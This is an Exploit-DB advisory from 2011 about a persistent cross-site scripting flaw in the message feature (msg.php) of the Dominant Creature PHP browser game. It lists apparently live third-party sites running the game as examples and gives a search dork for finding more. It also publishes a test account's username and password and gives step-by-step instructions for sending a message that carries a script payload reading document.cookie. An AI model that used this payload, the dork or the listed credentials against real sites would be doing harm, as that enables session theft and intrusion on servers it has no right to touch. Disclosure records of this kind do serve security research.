Dominant Creature BBG/RPG Browser Game Persistent XSS

2011-10-17T00:00:00
ID EDB-ID:17989
Type exploitdb
Reporter M.Jock3R
Modified 2011-10-17T00:00:00

Description

Dominant Creature BBG/RPG Browser Game Persistent XSS. Webapps exploit for php platform

                                        
                                            ===================================================================================
 Dominant Creature BBG/RPG browser game XSS vulnerabilities
===================================================================================
# Exploit Title: Dominant Creature BBG/RPG browser game XSS vulnerabilities
# Author: M.Jock3R 
# Script support: http://www.bbgdev.com/ 
# Script Download: http://sourceforge.net/projects/dcreature/
# Dork: core engine by Dominant Creature
# Category:: webapps
# Tested on: windows XP Sp2 FR
===================================================================================

Examples:
---------
1) http://creatures.site88.net/
2) http://dixieandtheninjas.net/goofing/DC/
3) http://tux.isa-geek.org/rpg/dm/login.php


Vuln file: msg.php

Vuln code:
---------
	$m = new Msg;
	if (isset($_GET["p"]) && isset($_GET["write"])) {
		$m->Write();
	}
	else {
	    $m->Inbox();
	}
}


Exploit:
---------

-You must  first login :(
You can  enter this account .. For test :)

http://raw.bplaced.net/games/dominantcreature/

username: m.jock3r
password: 01230123

Go to :

Duel opponents ==> Search for opponents : choose any user and enter Write message 

In message box write :

<script>alert(document.cookie)</script>

Click Send message.

-Enjoy playing with XSS :)


===================================================================================
Greets To :
adelsbm / attiadona  / the-code.tk

Email : madrido.jocker@gmail.com
  
THANKS TO ALL ALGERIANS HACK3RS
===================================================================================